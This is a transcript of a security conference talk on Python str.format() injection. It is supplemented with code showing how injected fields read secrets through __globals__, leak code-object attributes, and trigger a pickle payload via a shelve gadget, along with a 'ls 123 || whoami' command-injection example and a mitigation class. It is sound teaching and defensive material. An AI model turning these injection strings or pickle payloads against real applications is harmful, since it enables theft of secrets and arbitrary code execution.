
Brian Welch - Python Standard Library Gadgets for Upgrading Format String Exploits

BSides Augusta · 20:59 · 102 views · Published 2019-10
Transcript [en]

Afternoon, guys. I'm going to be talking to you today about techniques for upgrading Python format string exploits. I'm a cyber operations officer over at Fort Gordon, and I just enjoy doing this research in my free time, so I'm hoping to share some knowledge with you guys today. We're going to start out pretty basic, just talk about format strings and some basic vulnerabilities you might encounter, and then we'll go into some of the exploit upgrade techniques. We'll finish it out with a tool demo for automating some of this stuff. We are going to look at some code today, so if that's not your thing, I'm going to do my best to start from the ground up and explain all the details.

We are only focused on CPython, so none of the other implementations. If you don't know what those are, then we're probably talking about the Python that you already know and love. All the code samples from this talk were only tested in Python 3.7, so if you run them on your own computer, try to mirror that environment.

We'll start out with some background. First, you see we've got a little demo of what a format string actually is. It's just a nice way of formatting strings; it's a pretty descriptive name. You can pass different values into it, and it'll turn them into a string for you, formatted how you want them. It's actually one of three different ways to do it in Python: you've got your percent-style strings, the .format() method that we're going to be exploring today, and newer versions of Python have something called an f-string, which you see at the bottom there. But again, we're only going to be looking at the .format() method and the vulnerabilities associated with it today.

So right off the bat, we'll start looking at how these things might be vulnerable. Up at the top, we've got two pretty similar code samples, but there is a subtle difference, and if you notice, it's in these parentheses here. What that's doing is causing the input that we're passing in to actually have .format() called on it as well. When you're using format strings in your code, you never, ever want to call .format() on unvalidated user input, and in the right sample here, that's exactly what we're doing. This sample is just supposed to print your first name and then the first letter of your last name, but if we mess around with it, we can actually access some Python attributes. For those of you not familiar with format strings, this 0 here just means we're referring to the zeroth thing that we pass to the format method, which is this last name variable we have here.

So now that we've got a basic understanding of these vulnerabilities, what can we do with them? You can really abuse the way Python stores different attributes on instances of classes. In this example up here, we have some sensitive data that we really shouldn't be able to access from untrusted user input, but because of the way this class is defined, with an __init__ method on it, we're actually able to inject into the __class__ attribute of the zeroth argument we pass to format, move up to the __init__ method, and then dump the entire global namespace. This works just due to the way that Python creates classes and the methods on those classes. When the CPython interpreter executes the def statement that creates this method, the resulting function keeps a reference to the entire global namespace of the module it was defined in, and that's all packaged up in this __globals__ dictionary. You see from this format string injection that we're actually able to dump out that secret token that you really shouldn't be able to read. This is a pretty contrived example, but imagine this super-secret variable being something like an AWS key or other sensitive keys stored in memory in your web application: format strings are a way to read that data, which is pretty dangerous.

However, we are limited in what we can do with format strings. Below, we have another pretty contrived example of a calculator, and in our format string we're trying to call the add(1, 1) method so we can print out 2. But in the error message we get, we see that it says Calculator doesn't have an attribute add, and that's because CPython is not going to just execute any function that you call in a format string. An f-string, which is a newer feature of Python, will do that, but when you call .format(), it'll only try to access attributes and items. So we can read the global namespace, which is pretty good in a lot of cases, but if we want to write a real exploit, like executing arbitrary code or something like that, we've got to dig a little bit deeper.

So we're going to dig a little into the CPython internals; that's the code snippet we have up on the right side there. This is roughly how field resolution is done in a format string, and you can see it's willing to do two things for us: call getattr on an object and call getitem on an object. We're going to explore that a little more on the next slide, but just know that we are able to trigger some kind of execution within a format string, and we're not limited to just accessing attributes or printing strings, numbers, or stuff like that.

The way this works is because of three magic methods in Python: __getitem__, __getattribute__, and __getattr__. For those of you not super familiar with Python, these are hooks that let programmers create list-like interfaces, or other magic objects where you can say my_object.a_field and pull that field up from anywhere, no matter what. So if you're implementing your own list type, you might use __getitem__, and that would let you access arbitrary items through square brackets. We see an example of that in this format string down here, where we're trying to access the zero index of the object we pass as the zeroth argument, which is our __getitem__ instance, and then we try to access some other attributes on arguments 1 and 2, which we're also passing into our format call.

__getattr__ and __getattribute__ are pretty similar, but there are some subtle differences in the way they operate. __getattr__ will only be called if Python can't resolve the attribute you're trying to access through its standard lookup, but __getattribute__ will be called no matter what. So if you're trying to implement your own magic lookup object or something like that, you probably want to go with __getattr__, because you can run into some weird recursion problems with __getattribute__. This is just trying to demonstrate to you guys that we can in fact execute some functions: in the previous slide we couldn't execute our calculator's add method, but we can trigger execution with __getitem__, __getattr__, and __getattribute__.

Going with this theme, we're going to look for some gadgets within the Python standard library that have vulnerable definitions of __getitem__, __getattr__, and __getattribute__, because we can in fact trigger code execution through them. We have a pretty contrived example of something that would be vulnerable and useful to us: this FileLister class, whose __getitem__ definition just calls os.system. os.system will just run a shell command for you, and this class is naively appending the pattern to ls to try to list files that match that pattern. In this example, we instantiate our object, then access a pattern through the __getitem__ square brackets, and it prints out two different files that match that pattern. But if we use some shell operators, like the double pipe here, which means the following command runs if the first one failed, we're actually executing ls 123 || whoami in this line. ls 123 is going to fail because there's no 123 file, so because of the double pipe, whoami is going to run, and it just prints out my computer name and username, which you can see at the bottom once that dialog disappears. Right there. Yeah, I named my computer Brian Jr.

All right, so now that we have an idea of how we can abuse these different __getitem__, __getattr__, and __getattribute__ methods, I did some digging through the CPython standard library for modules and classes that can potentially be abused if you can find them in memory during your format string injections. The first of the two we're going to look at today is the fileinput module. This is a module that lets you iterate over lines from several input streams in sequence, and it can be abused because it provides a __getitem__ definition that lets you read lines from the file. You do have to read these lines in succession, so it's a little limited, but if you had a format string injection and were able to find an open fileinput object floating around in memory, you would be able to read data from whatever file is open by indexing it with successive line numbers in the brackets, which in turn call the __getitem__ method of that class. So that is fairly limited. It doesn't give us code execution, but file disclosure is still a bigger win than just reading the Python global namespace.

The next module I want to explore is the shelve module, which persists Python objects using pickle. For those of you guys not familiar with pickling, it's Python's method of serializing Python objects into bytes that can then be stored in a file on your system or in a database. This is a pretty cool feature, but it also has a lot of associated security vulnerabilities: when you deserialize bytes into a Python object, the bytes you pass to the deserialize method can make it execute arbitrary code. We can see that Shelf's __getitem__ implementation is doing a lot. You're really only supposed to be reading objects in __getitem__, not executing a lot of code on the side; that's called a side effect. You can see here that it's doing a lookup on the dictionary stored internally in the Shelf, and then it's instantiating an Unpickler on the result and loading it. So this isn't a straightaway win gadget; you do need to do some massaging to get the right bytes in memory that you could then trigger through a format string injection. But what I wanted to show you guys with these fileinput and shelve examples is that when these __getitem__, __getattr__, and __getattribute__ implementations try to do too much, you can abuse them, and if you're able to get them into the right condition, you can use them to upgrade your exploits beyond global namespace reads.

But when you're looking for these gadgets within a proprietary application, you don't necessarily have a lot of insight into what kind of code the application you're injecting into is running. So I've devised a way to extract the full source code of any application you're targeting, and the reason this is possible is the __code__ attribute that gets stored on function objects in Python. This is a pretty cool side effect of the Python runtime: whenever the Python interpreter compiles a function, it stores a lot of runtime metadata on that object, and that's all stored in this double-underscore code attribute, __code__. In the example here, we're just defining a simple function that prints something out, and when we print its __code__ attribute on this line, you see it's a code object.

This code object has a lot of different metadata on it. The first one we're looking at is the co_code attribute, and you see it just prints out a bunch of random-looking bytes, but that's actually the raw Python bytecode that the interpreter executes when you call this function. Python ships with a bytecode disassembler in the dis module, so over here we're just printing out the disassembled bytecode. This gives a little more insight. It's not super readable if you're not familiar with Python bytecode, but Python is a stack-based interpreter, so it's just pushing some items onto the stack, popping them off, and then calling our print function. Another piece of metadata on this code object is co_consts, and you see here that the string we're printing is actually stored as one of these constant values.

These are just two of the 10 to 15 attributes on these code objects, and if you extract all of them, you're able to reassemble these code objects and then decompile them back into source code. There are some pretty cool Python bytecode decompilation engines out there. I think the best one is the open source uncompyle6 project, which does some pretty slick stuff under the hood, looking for patterns in Python bytecode, and it's able to reassemble them back into Python source code. So if we're able to pull out all of the __code__ object's attributes, we can package them back up into a code type, which you see here; these are all the different metadata attributes that we have to pull out. We only looked at two of them, but there are quite a few. Then we can decompile that code object with this function call here. It prints out some of its decompilation metadata, and then you see it returns that print statement at the end, which is actually the print statement from the function we defined earlier. So that's pretty cool.

And because all of these code attributes are just that, attributes, we can access all of them from format string injections. Because of this, we can put it all together into a neat little tool that automates all this. The steps we follow are these. First, we have to manually find our format string injection vulnerability; this tool won't do anything magic for us in that regard, so you do have to identify it yourself. From there, if we're able to break into the Python global namespace, then we can not only read it but also escape into pretty much any Python object that's loaded into memory, including modules adjacent to the one we break into. We can recursively visit everything in memory at that point, dump all of their different code attributes, and decompile all of that, maintaining some kind of semantic understanding of where we're at in the Python namespace, to reconstruct the vulnerable application's source code.

In order to put all that together, I created this tool called 4matic. It's on my GitHub if you guys want to check it out, but I have a demo prepared that we'll look at here. We're going to look through some terminal output together during the tool's runtime. If you guys aren't familiar with asciinema.org, it's a pretty sweet service for recording terminal sessions. This isn't actually video; this is all text you can copy and paste. So if you guys ever do demos like this, I think it's a pretty sweet tool to use. But we'll dive into this right now.
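To make the primitives above concrete, here is a minimal sketch, assuming Python 3 (the talk's own samples were tested on 3.7). SECRET_TOKEN, Greeter, and render are hypothetical stand-ins for a vulnerable application, not code from the talk. It shows the __globals__ read through __init__, why a field like {0.hello()} is only an attribute lookup and not a call, and that code-object attributes such as co_code, co_consts, and co_names leak as text that ast.literal_eval can turn back into values when their reprs are plain literals.

```python
import ast

# Hypothetical "vulnerable application"; the names are illustrative only.
SECRET_TOKEN = "not-a-real-aws-key"


class Greeter:
    def __init__(self, name):
        self.name = name

    def hello(self):
        return "Hello, " + self.name


def render(user_template, obj):
    # BUG: the user controls the format string itself.
    return user_template.format(obj)


g = Greeter("world")
print(render("{0.name}", g))  # world

# 1. Hop from the instance to its class, then to a Python-level method.
#    __globals__ is the namespace of the module the method was defined in.
print(render("{0.__class__.__init__.__globals__[SECRET_TOKEN]}", g))  # not-a-real-aws-key

# 2. Field names only do getattr/getitem, so "hello()" is looked up as an
#    attribute literally named "hello()", and nothing is called.
try:
    render("{0.hello()}", g)
except AttributeError as exc:
    print("no calls:", exc)

# 3. Code-object metadata is made of plain attributes, so it leaks as text too.
leaked_code = render("{0.__class__.hello.__code__.co_code}", g)
leaked_consts = render("{0.__class__.hello.__code__.co_consts}", g)
leaked_names = render("{0.__class__.hello.__code__.co_names}", g)

# The reprs of bytes, str, and None are literals, so they can be parsed back.
print(ast.literal_eval(leaked_code) == Greeter.hello.__code__.co_code)  # True
print(ast.literal_eval(leaked_consts), ast.literal_eval(leaked_names))
```

Rebuilding a complete code object from leaked attributes (via types.CodeType) is version-specific, because the constructor's parameters changed across Python releases, so this sketch stops at recovering individual attributes.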

So we start out looking at the vulnerable application that we're going to use for this example, which is just a command-line application. You see there's some data, and we'll scroll down to the vulnerable piece of code that allows us to inject into it. Keep scrolling. The actual reason we're able to inject into this piece of software is that it takes the inject argument straight from the user and calls format on it, and as we touched on earlier in this talk, that's something you should never, ever do. So this application is vulnerable, and once we get through this examination, you'll see in the demo that we do inject into it, just as a sanity check. Wait for us to exit here, and then this is how the vulnerable command-line application gets invoked: we can pass a format string into the inject parameter, and it will print out this dummy class, which is the parameter that gets passed to format.

Next up, we're going to see this tool get run. We invoke it as a Python module, and what you pass to this tool is the actual command line for how you inject into the target. You'll see we're calling the same command that we called just up here, but with the injection parameter set to these two @ signs, and the tool will swap in all the different format strings it's going to run there. So we'll let it go, and you see right away it's already enumerated a bunch of different attributes based on the injection. The first thing it goes to is the __class__ attribute, where you have this __bases__ tuple, which holds all the base classes of that class. Because this class only has the base class object, you only see it going through the first one and trying to pull out different metadata from that class, but it's already able to pull out the docstring as well as the name and everything. Because that class has an empty definition, you don't see any methods getting dumped, but as we keep going, it's able to fully extract all the functions within that class, including class-level attributes up here, and it dumps the full source code out to the terminal. If we let this run, it'll keep recursively walking the entire global namespace. All of the different Python standard library modules are blacklisted, so it won't recursively walk forever. Then you see its runtime caps out, we get to the end, and the last thing it printed out was the main method. So I think it's pretty cool that from just one injection you're able to access all this different stuff and extract a lot of sensitive information, and if you're able to find the right gadgets in the source code you dump out, you can upgrade your exploit to code execution or file disclosure.

So, as I've been reiterating during the talk: don't call format on untrusted user input; it's just going to lead to bad things for you. Also, don't get too creative with your __getitem__, __getattribute__, and __getattr__ methods; they really shouldn't have side effects of any kind. Thanks for your time, guys. That pretty much concludes my talk. You can find these slides at the link, and feel free to reach out. I'll be taking questions now. Yes? Yes.
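The closing advice can be illustrated with a minimal sketch, assuming an attacker has already placed pickle bytes into a shelf's backing store (the "massaging" step mentioned earlier). Payload, backing, and SafeFormatter are hypothetical names; the payload calls eval on a harmless expression where a real one might name os.system. SafeFormatter is one possible mitigation, not something shown in the talk: it overrides string.Formatter.get_field to accept only bare keyword names, so attribute and index lookups are rejected before any __getattr__ or __getitem__ runs.

```python
import pickle
import shelve
import string


class Payload:
    """Stand-in for attacker-controlled pickle bytes (hypothetical).
    Unpickling calls eval("6 * 7"); a real payload could name os.system."""

    def __reduce__(self):
        return (eval, ("6 * 7",))


# Assumed setup: malicious bytes already sit in the shelf's backing dict.
# Shelf encodes string keys to bytes (utf-8 by default) before lookup.
backing = {b"config": pickle.dumps(Payload())}
shelf = shelve.Shelf(backing)

# Shelf.__getitem__ unpickles, so a plain index in a format string runs it.
leaked = "{0[config]}".format(shelf)
print(leaked)  # 42


class SafeFormatter(string.Formatter):
    """Allow only bare keyword fields like {name}. Attribute access,
    indexing, and positional fields are rejected before any lookup."""

    def get_field(self, field_name, args, kwargs):
        if not field_name.isidentifier():
            raise ValueError(f"disallowed replacement field: {field_name!r}")
        return super().get_field(field_name, args, kwargs)


safe = SafeFormatter()
print(safe.format("Hello {name}", name="world"))  # Hello world
try:
    safe.format("{s[config]}", s=shelf)
except ValueError as exc:
    print(exc)  # disallowed replacement field: 's[config]'
```

string.Template is another option when templates must come from users, since its $name placeholders have no attribute or index syntax.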

Oh yeah, I like doing that kind of stuff for sure: CTFs and crackmes and stuff, yeah, for different vulnerable machines. And yeah, not in my job, but in my free time. All right, well, thanks for your time, guys. Feel free to come up and ask me any questions if you have them. I do have some stuff to give out. I'll give the first one out to the gentleman that asked a question, but if anyone else has a question, I'll give them something as well.

All right, sweet. Thanks, guys, appreciate it. What?

So f-strings aren't really vulnerable to this, because they get parsed at compile time, not at run time, so it's not really applicable. But how about the other question? Go ahead.
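To illustrate the answer above, here is a minimal sketch with hypothetical values. An f-string's template is fixed in the source and parsed when the code is compiled, so braces inside a substituted value are copied through literally, whereas concatenating user input into a string and then calling .format() lets those braces be parsed at run time. The expressions inside an f-string are still evaluated at run time; only the template itself is fixed.

```python
# Hypothetical values for illustration.
secret = "hunter2"
user_input = "{secret}"  # attacker-supplied text containing braces

# f-string: user_input is substituted as a value and never re-parsed.
via_fstring = f"You typed: {user_input}"
print(via_fstring)  # You typed: {secret}

# .format() on a string that contains user input: the braces are parsed now.
via_format = ("You typed: " + user_input).format(secret=secret)
print(via_format)  # You typed: hunter2
```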

[Applause]

[ feedback ]